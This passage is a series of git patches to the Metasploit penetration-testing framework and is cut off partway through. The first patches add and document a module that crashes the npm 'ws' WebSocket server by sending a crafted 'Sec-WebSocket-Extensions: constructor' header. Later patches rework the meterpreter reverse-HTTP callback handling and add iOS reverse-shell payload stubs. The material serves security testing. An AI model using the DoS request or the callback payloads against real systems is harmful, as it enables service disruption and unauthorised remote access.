From c992837f0d09359a920122ea046979d2ca1ac30e Mon Sep 17 00:00:00 2001 From: Ryan Knell Date: Thu, 7 Dec 2017 10:45:57 -0500 Subject: [PATCH 01/37] Adding ws DoS module This module verifies if ws is vulnerable to DoS by sending a request to the server containing a specific header value. ws is a npm module which handles websockets. --- modules/auxiliary/dos/http/ws_dos.rb | 72 ++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 modules/auxiliary/dos/http/ws_dos.rb diff --git a/modules/auxiliary/dos/http/ws_dos.rb b/modules/auxiliary/dos/http/ws_dos.rb new file mode 100644 index 0000000000..04b8982b41 --- /dev/null +++ b/modules/auxiliary/dos/http/ws_dos.rb @@ -0,0 +1,72 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize + super( + 'Name' => 'ws - Denial of Service', + 'Description' => %q{ + This module exploits a Denial of Service vulnerability in npm module "ws". + By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash. + }, + 'References' => + [ + ['URL', 'https://nodesecurity.io/advisories/550'], + ['CWE', '400'], + ], + 'Author' => + [ + 'Ryan Knell, Sonatype Security Research', + 'Nick Starke, Sonatype Security Research', + ], + 'License' => MSF_LICENSE + ) + + register_options([ + Opt::RPORT(3000), + OptString.new('TARGETURI', [true, 'The base path', '/']), + ],) + end + + def run + path = datastore['TARGETURI'] + + #Create HTTP request + req = [ + "GET #{path} HTTP/1.1", + "Connection: Upgrade", + "Sec-WebSocket-Key: test", + "Sec-WebSocket-Version: 8", + "Sec-WebSocket-Extensions: constructor", #Adding "constructor" as the value for this header causes the DoS + "Upgrade: websocket", + "\r\n" + ].join("\r\n"); + + begin + connect + print_status("Sending DoS packet to #{peer}") + sock.put(req) + + data = sock.get_once(-1) #Attempt to retrieve data from the socket + + if data =~ /101/ #This is the expected HTTP status code. IF it's present, we have a valid upgrade response. + print_error("WebSocket Upgrade request Successful, service not vulnerable.") + else + fail_with(Failure::Unknown, "An unknown error occured") + end + + disconnect + print_error("DoS packet unsuccessful") + + rescue ::Rex::ConnectionRefused + print_error("Unable to connect to #{peer}") + rescue ::Errno::ECONNRESET, ::EOFError + print_good("DoS packet successful. #{peer} not responding.") + end + end +end From 668585a1f9a51dc442cf78de7ac73601fd39049f Mon Sep 17 00:00:00 2001 From: Ryan Knell Date: Fri, 8 Dec 2017 15:52:57 -0500 Subject: [PATCH 02/37] Adding documentation Adding module documentation for ws_dos. --- .../modules/auxiliary/dos/http/ws_dos.md | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 documentation/modules/auxiliary/dos/http/ws_dos.md diff --git a/documentation/modules/auxiliary/dos/http/ws_dos.md b/documentation/modules/auxiliary/dos/http/ws_dos.md new file mode 100644 index 0000000000..daad55946d --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/ws_dos.md @@ -0,0 +1,61 @@ +## Vulnerable Application + + [ws < 1.1.5 || (2.0.0 , 3.3.1)] + (https://nodesecurity.io/advisories/550) + +## Vulnerable Analysis + + This module exploits a Denial of Service vulnerability in npm module "ws". + By sending a specially crafted value of the Sec-WebSocket-Extensions header + on the initial WebSocket upgrade request, the ws component will crash. + +## Verification Steps + +1. Start the vulnerable server using the sample server code below `node server.js` +2. Start `msfconsole` +3. `use auxiliary/dos/http/ws_dos` +4. `set RHOST XXX.XXX.XXX.XXX` +5. `run` +6. The server should crash + +## Options + + None. + +## Scenarios + +## Server output from crash +``` +/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40 + paramsList.push(parsedParams); + ^ + +TypeError: paramsList.push is not a function + at value.split.forEach (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40:16) + at Array.forEach () + at Object.parse (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:15:20) + at WebSocketServer.completeUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:230:30) + at WebSocketServer.handleUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:197:10) + at Server.WebSocketServer._ultron.on (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:87:14) + at emitThree (events.js:136:13) + at Server.emit (events.js:217:7) + at onParserExecuteCommon (_http_server.js:495:14) + at onParserExecute (_http_server.js:450:3) +``` + +## Sample server +``` +const WebSocket = require('ws'); +const wss = new WebSocket.Server( +{ port: 3000 } +); +wss.on('connection', function connection(ws) { +console.log('connected'); +ws.on('message', function incoming(message) +{ console.log('received: %s', message); } +); +ws.on('error', function (err) +{ console.error(err); } +); +}); +``` From c5f218c84c60373f0d01441577e90a63497d4edb Mon Sep 17 00:00:00 2001 From: Ryan Knell Date: Mon, 11 Dec 2017 11:49:31 -0500 Subject: [PATCH 03/37] Addressing comments 1. Updated documentation 2. Made the Sec-WebSocket-Key header a random value --- .../modules/auxiliary/dos/http/ws_dos.md | 18 +++++++----------- modules/auxiliary/dos/http/ws_dos.rb | 2 +- 2 files changed, 8 insertions(+), 12 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/ws_dos.md b/documentation/modules/auxiliary/dos/http/ws_dos.md index daad55946d..6668f471df 100644 --- a/documentation/modules/auxiliary/dos/http/ws_dos.md +++ b/documentation/modules/auxiliary/dos/http/ws_dos.md @@ -1,26 +1,22 @@ ## Vulnerable Application - - [ws < 1.1.5 || (2.0.0 , 3.3.1)] - (https://nodesecurity.io/advisories/550) +ws < 1.1.5 || (2.0.0 , 3.3.1) +https://nodesecurity.io/advisories/550 ## Vulnerable Analysis - - This module exploits a Denial of Service vulnerability in npm module "ws". - By sending a specially crafted value of the Sec-WebSocket-Extensions header - on the initial WebSocket upgrade request, the ws component will crash. +This module exploits a Denial of Service vulnerability in npm module "ws". +By sending a specially crafted value of the Sec-WebSocket-Extensions header +on the initial WebSocket upgrade request, the ws component will crash. ## Verification Steps - 1. Start the vulnerable server using the sample server code below `node server.js` 2. Start `msfconsole` 3. `use auxiliary/dos/http/ws_dos` -4. `set RHOST XXX.XXX.XXX.XXX` +4. `set RHOST 5. `run` 6. The server should crash ## Options - - None. +None. ## Scenarios diff --git a/modules/auxiliary/dos/http/ws_dos.rb b/modules/auxiliary/dos/http/ws_dos.rb index 04b8982b41..0c4162d2c6 100644 --- a/modules/auxiliary/dos/http/ws_dos.rb +++ b/modules/auxiliary/dos/http/ws_dos.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary req = [ "GET #{path} HTTP/1.1", "Connection: Upgrade", - "Sec-WebSocket-Key: test", + "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(rand(10) + 5).to_s}", "Sec-WebSocket-Version: 8", "Sec-WebSocket-Extensions: constructor", #Adding "constructor" as the value for this header causes the DoS "Upgrade: websocket", From 017374be7156e4ccc410b075ed1b054cf2fa9fe6 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 02:38:46 -0600 Subject: [PATCH 04/37] pass lhost/lport back into generate_stage with reverse_http/s --- lib/msf/core/handler/reverse_http.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 025e127608..c51a79de4e 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -369,6 +369,8 @@ protected blob = self.generate_stage( url: url, uuid: uuid, + lhost: uri.host, + lport: uri.port, uri: conn_id ) From 636b93b0261539e81ebea290b976ab9e4b65749b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 11:29:41 -0600 Subject: [PATCH 05/37] minor simplification --- lib/msf/core/payload/python/meterpreter_loader.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 5bb0143857..7b0a50b3b2 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -110,9 +110,9 @@ module Payload::Python::MeterpreterLoader callback_url = [ opts[:url].to_s.split(':')[0], '://', - (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, + (ds['OverrideRequestHost'] ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, ':', - (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, + (ds['OverrideRequestHost'] ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, ds['LURI'].to_s, uri, '/' From 8e76c4cb4f5ad0d1aeba76d04a42b3a13433416e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 11:29:59 -0600 Subject: [PATCH 06/37] handle override at the meterpreter config layer --- lib/msf/core/handler/reverse_http.rb | 2 -- lib/msf/core/payload/transport_config.rb | 22 ++++++++++++++++++---- 2 files changed, 18 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index c51a79de4e..025e127608 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -369,8 +369,6 @@ protected blob = self.generate_stage( url: url, uuid: uuid, - lhost: uri.host, - lport: uri.port, uri: conn_id ) diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 84e257bcce..28e754827a 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -37,7 +37,11 @@ module Msf::Payload::TransportConfig def transport_config_reverse_https(opts={}) ds = opts[:datastore] || datastore config = transport_config_reverse_http(opts) - config[:scheme] = ds['OverrideScheme'] || 'https' + if ds['OverrideRequestHost'] + config[:scheme] = ds['OverrideScheme'] || 'https' + else + config[:scheme] = 'https' + end config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], ds['HandlerSSLCert']) config @@ -55,10 +59,20 @@ module Msf::Payload::TransportConfig end ds = opts[:datastore] || datastore + + scheme = 'http' + lhost = ds['LHOST'] + lport = ds['LPORT'] + if ds['OverrideRequestHost'] + scheme = ds['OverrideScheme'] || 'http' + lhost = ds['OverrideLHOST'] || ds['LHOST'] + lport = ds['OverrideLPORT'] || ds['LPORT'] + end + { - scheme: ds['OverrideScheme'] || 'http', - lhost: opts[:lhost] || ds['LHOST'], - lport: (opts[:lport] || ds['LPORT']).to_i, + scheme: scheme, + lhost: lhost, + lport: lport.to_i, uri: uri, ua: ds['HttpUserAgent'], proxy_host: ds['HttpProxyHost'], From f49006222cde1e45bf73783b9dd8888a4b9c84c6 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 12:34:34 -0600 Subject: [PATCH 07/37] remove unneeded uri --- lib/msf/core/handler/reverse_http.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 025e127608..a720b65993 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -360,7 +360,6 @@ protected # Damn you, python! Ruining my perfect world! url += "\x00" unless uuid.arch == ARCH_PYTHON - uri = URI(payload_uri(req) + conn_id) # TODO: does this have to happen just for windows, or can we set it for all? resp['Content-Type'] = 'application/octet-stream' if uuid.platform == 'windows' From 528a423fc0da887c3aa7f04e5082761166f2f835 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 12:34:51 -0600 Subject: [PATCH 08/37] fix python override scheme --- .../core/payload/python/meterpreter_loader.rb | 23 +++++++++++-------- lib/msf/core/payload/transport_config.rb | 11 ++++----- 2 files changed, 18 insertions(+), 16 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 7b0a50b3b2..682d5e91b2 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -107,16 +107,19 @@ module Payload::Python::MeterpreterLoader # TODO: move this to somewhere more common so that it can be used across payload types unless opts[:url].to_s == '' uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}" - callback_url = [ - opts[:url].to_s.split(':')[0], - '://', - (ds['OverrideRequestHost'] ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, - ':', - (ds['OverrideRequestHost'] ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, - ds['LURI'].to_s, - uri, - '/' - ].join('') + + scheme = opts[:url].to_s.split(':')[0] + lhost = ds['LHOST'] + lport = ds['LPORT'] + if ds['OverrideRequestHost'] + scheme = ds['OverrideScheme'] || scheme + lhost = ds['OverrideLHOST'] || lhost + lport = ds['OverrideLPORT'] || lport + end + + callback_url = "#{scheme}://#{lhost}:#{lport}#{ds['LURI']}#{uri}/" + + $stderr.puts callback_url # patch in the various payload related configuration met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 28e754827a..c83c50da2e 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -37,10 +37,9 @@ module Msf::Payload::TransportConfig def transport_config_reverse_https(opts={}) ds = opts[:datastore] || datastore config = transport_config_reverse_http(opts) + config[:scheme] = 'https' if ds['OverrideRequestHost'] - config[:scheme] = ds['OverrideScheme'] || 'https' - else - config[:scheme] = 'https' + config[:scheme] = ds['OverrideScheme'] || config[:scheme] end config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], ds['HandlerSSLCert']) @@ -64,9 +63,9 @@ module Msf::Payload::TransportConfig lhost = ds['LHOST'] lport = ds['LPORT'] if ds['OverrideRequestHost'] - scheme = ds['OverrideScheme'] || 'http' - lhost = ds['OverrideLHOST'] || ds['LHOST'] - lport = ds['OverrideLPORT'] || ds['LPORT'] + scheme = ds['OverrideScheme'] || scheme + lhost = ds['OverrideLHOST'] || lhost + lport = ds['OverrideLPORT'] || lport end { From bb5ea540abd5ae42b99cc83b1e752a5866f85152 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 12:54:51 -0600 Subject: [PATCH 09/37] fix a number of TODO's in the HTTP handler, remove duplication in handlers --- lib/msf/core/handler/reverse_http.rb | 69 +++++++++------------------- 1 file changed, 21 insertions(+), 48 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index a720b65993..68a7976205 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -339,6 +339,13 @@ protected self.pending_connections += 1 + resp.body = '' + resp.code = 200 + resp.message = 'OK' + + url = payload_uri(req) + conn_id + url << '/' unless url[-1] == '/' + # Process the requested resource. case info[:mode] when :init_connect @@ -354,58 +361,27 @@ protected pkt.add_tlv(Rex::Post::Meterpreter::TLV_TYPE_TRANS_URL, conn_id + "/") resp.body = pkt.to_r - when :init_python, :init_native, :init_java + when :init_python, :init_native, :init_java, :connect # TODO: at some point we may normalise these three cases into just :init - url = payload_uri(req) + conn_id + '/' - # Damn you, python! Ruining my perfect world! - url += "\x00" unless uuid.arch == ARCH_PYTHON + if info[:mode] == :connect + print_status("Attaching orphaned/stageless session...") + else + begin + blob = self.generate_stage(url: url, uuid: uuid, uri: conn_id) + blob = encode_stage(blob) if self.respond_to?(:encode_stage) - # TODO: does this have to happen just for windows, or can we set it for all? - resp['Content-Type'] = 'application/octet-stream' if uuid.platform == 'windows' + print_status("Staging #{uuid.arch} payload (#{blob.length} bytes) ...") - begin - blob = self.generate_stage( - url: url, - uuid: uuid, - uri: conn_id - ) + resp['Content-Type'] = 'application/octet-stream' + resp.body = blob - blob = encode_stage(blob) if self.respond_to?(:encode_stage) - - print_status("Staging #{uuid.arch} payload (#{blob.length} bytes) ...") - - resp.body = blob - - # Short-circuit the payload's handle_connection processing for create_session - create_session(cli, { - :passive_dispatcher => self.service, - :conn_id => conn_id, - :url => url, - :expiration => datastore['SessionExpirationTimeout'].to_i, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :retry_total => datastore['SessionRetryTotal'].to_i, - :retry_wait => datastore['SessionRetryWait'].to_i, - :ssl => ssl?, - :payload_uuid => uuid - }) - rescue NoMethodError - print_error("Staging failed. This can occur when stageless listeners are used with staged payloads.") - return + rescue NoMethodError + print_error("Staging failed. This can occur when stageless listeners are used with staged payloads.") + return + end end - when :connect - print_status("Attaching orphaned/stageless session...") - - resp.body = '' - - url = payload_uri(req) + conn_id - url << '/' unless url[-1] == '/' - - # Damn you, python! Ruining my perfect world! - url += "\x00" unless uuid.arch == ARCH_PYTHON - - # Short-circuit the payload's handle_connection processing for create_session create_session(cli, { :passive_dispatcher => self.service, :conn_id => conn_id, @@ -422,8 +398,6 @@ protected unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode]) print_status("Unknown request to #{request_summary}") end - resp.code = 200 - resp.message = 'OK' resp.body = datastore['HttpUnknownRequestResponse'].to_s self.pending_connections -= 1 end @@ -435,6 +409,5 @@ protected end end - end end From b7c231bb93c936424b39a547284e729564e49d47 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 13:00:56 -0600 Subject: [PATCH 10/37] further normalize transport config --- lib/msf/core/payload/python/meterpreter_loader.rb | 2 -- lib/msf/core/payload/transport_config.rb | 6 +----- 2 files changed, 1 insertion(+), 7 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 682d5e91b2..b5db7c647f 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -119,8 +119,6 @@ module Payload::Python::MeterpreterLoader callback_url = "#{scheme}://#{lhost}:#{lport}#{ds['LURI']}#{uri}/" - $stderr.puts callback_url - # patch in the various payload related configuration met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index c83c50da2e..57c06aaa3d 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -37,10 +37,6 @@ module Msf::Payload::TransportConfig def transport_config_reverse_https(opts={}) ds = opts[:datastore] || datastore config = transport_config_reverse_http(opts) - config[:scheme] = 'https' - if ds['OverrideRequestHost'] - config[:scheme] = ds['OverrideScheme'] || config[:scheme] - end config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], ds['HandlerSSLCert']) config @@ -59,7 +55,7 @@ module Msf::Payload::TransportConfig ds = opts[:datastore] || datastore - scheme = 'http' + scheme = opts[:url].to_s.split(':')[0] lhost = ds['LHOST'] lport = ds['LPORT'] if ds['OverrideRequestHost'] From f7dfba6bae32a9127052ebe3b9d0fca656296902 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 10 Dec 2017 13:08:05 -0600 Subject: [PATCH 11/37] deduplicate code from python meterpreter --- .../core/payload/python/meterpreter_loader.rb | 16 +++++------- lib/msf/core/payload/transport_config.rb | 25 ++++++++++++------- 2 files changed, 22 insertions(+), 19 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index b5db7c647f..3c14a4d7c1 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'msf/core' +require 'msf/core/payload/transport_config' require 'msf/base/sessions/meterpreter_options' require 'msf/core/payload/uuid/options' @@ -16,6 +17,7 @@ module Payload::Python::MeterpreterLoader include Msf::Payload::Python include Msf::Payload::UUID::Options + include Msf::Payload::TransportConfig include Msf::Sessions::MeterpreterOptions def initialize(info = {}) @@ -106,17 +108,11 @@ module Payload::Python::MeterpreterLoader # so we need to generate it # TODO: move this to somewhere more common so that it can be used across payload types unless opts[:url].to_s == '' + + # Build the callback URL (TODO: share this logic with TransportConfig uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}" - - scheme = opts[:url].to_s.split(':')[0] - lhost = ds['LHOST'] - lport = ds['LPORT'] - if ds['OverrideRequestHost'] - scheme = ds['OverrideScheme'] || scheme - lhost = ds['OverrideLHOST'] || lhost - lport = ds['OverrideLPORT'] || lport - end - + opts[:scheme] ||= opts[:url].to_s.split(':')[0] + scheme, lhost, lport = transport_uri_components(opts) callback_url = "#{scheme}://#{lhost}:#{lport}#{ds['LURI']}#{uri}/" # patch in the various payload related configuration diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 57c06aaa3d..678d3b305f 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -36,12 +36,26 @@ module Msf::Payload::TransportConfig def transport_config_reverse_https(opts={}) ds = opts[:datastore] || datastore + opts[:scheme] ||= 'https' config = transport_config_reverse_http(opts) config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], ds['HandlerSSLCert']) config end + def transport_uri_components(opts={}) + ds = opts[:datastore] || datastore + scheme = opts[:scheme] + lhost = ds['LHOST'] + lport = ds['LPORT'] + if ds['OverrideRequestHost'] + scheme = ds['OverrideScheme'] || scheme + lhost = ds['OverrideLHOST'] || lhost + lport = ds['OverrideLPORT'] || lport + end + [scheme, lhost, lport] + end + def transport_config_reverse_http(opts={}) # most cases we'll have a URI already, but in case we don't # we should ask for a connect to happen given that this is @@ -54,15 +68,8 @@ module Msf::Payload::TransportConfig end ds = opts[:datastore] || datastore - - scheme = opts[:url].to_s.split(':')[0] - lhost = ds['LHOST'] - lport = ds['LPORT'] - if ds['OverrideRequestHost'] - scheme = ds['OverrideScheme'] || scheme - lhost = ds['OverrideLHOST'] || lhost - lport = ds['OverrideLPORT'] || lport - end + opts[:scheme] ||= 'http' + scheme, lhost, lport = transport_uri_components(opts) { scheme: scheme, From 3f6846c3320b661f088d1189d652fd34e69f7c9b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 12 Dec 2017 03:13:38 -0600 Subject: [PATCH 12/37] update payloads with python retry fix --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- 6 files changed, 7 insertions(+), 7 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index e7df9af975..3eb282d059 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.19) + metasploit-payloads (= 1.3.20) metasploit_data_models metasploit_payloads-mettle (= 0.2.8) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.19) + metasploit-payloads (1.3.20) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 873d24e759..d1503dbacb 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.19' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.20' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index f5e7303a36..4d4122c50f 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 57798 + CachedSize = 58390 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index f016ee0023..718834de94 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 57762 + CachedSize = 58354 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index d13916ecb6..1332079c54 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 57762 + CachedSize = 58354 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 721b61e0de..ed4250ec79 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 57714 + CachedSize = 58306 include Msf::Payload::Single include Msf::Payload::Python From c4e20e01e3156f8e09dc498e29ac1a3d52d609bd Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 12 Dec 2017 16:05:23 +0800 Subject: [PATCH 13/37] iOS meterpreter --- .../sessions/meterpreter_aarch64_apple_ios.rb | 29 ++++++++++++ lib/msf/core/module/platform.rb | 8 ++++ lib/msf/core/payload/uuid.rb | 3 +- modules/exploits/multi/handler.rb | 2 +- .../aarch64/meterpreter_reverse_http.rb | 44 +++++++++++++++++++ .../aarch64/meterpreter_reverse_https.rb | 44 +++++++++++++++++++ .../aarch64/meterpreter_reverse_tcp.rb | 44 +++++++++++++++++++ tools/modules/generate_mettle_payloads.rb | 3 +- 8 files changed, 174 insertions(+), 3 deletions(-) create mode 100644 lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb create mode 100644 modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb create mode 100644 modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb diff --git a/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb b/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb new file mode 100644 index 0000000000..49859514e6 --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_aarch64_Apple_iOS < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'apple_ios' + self.base_arch = ARCH_AARCH64 + end +end + +end +end + diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index de0e7fbaca..3ca4373e70 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -560,4 +560,12 @@ class Msf::Module::Platform Alias = "hardware" end + # + # Apple iOS + # + class Apple_iOS < Msf::Module::Platform + Rank = 100 + Alias = "apple_ios" + end + end diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb index f510c88469..6d98f77934 100644 --- a/lib/msf/core/payload/uuid.rb +++ b/lib/msf/core/payload/uuid.rb @@ -72,7 +72,8 @@ class Msf::Payload::UUID 21 => 'python', 22 => 'nodejs', 23 => 'firefox', - 24 => 'r' + 24 => 'r', + 25 => 'apple_ios', } # The raw length of the UUID structure diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index e436abba9d..c87049bf46 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote 'BadChars' => '', 'DisableNops' => true }, - 'Platform' => %w[android bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi], + 'Platform' => %w[android apple_ios bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi], 'Arch' => ARCH_ALL, 'Targets' => [ [ 'Wildcard Target', {} ] ], 'DefaultTarget' => 0, diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..c8ac809abd --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 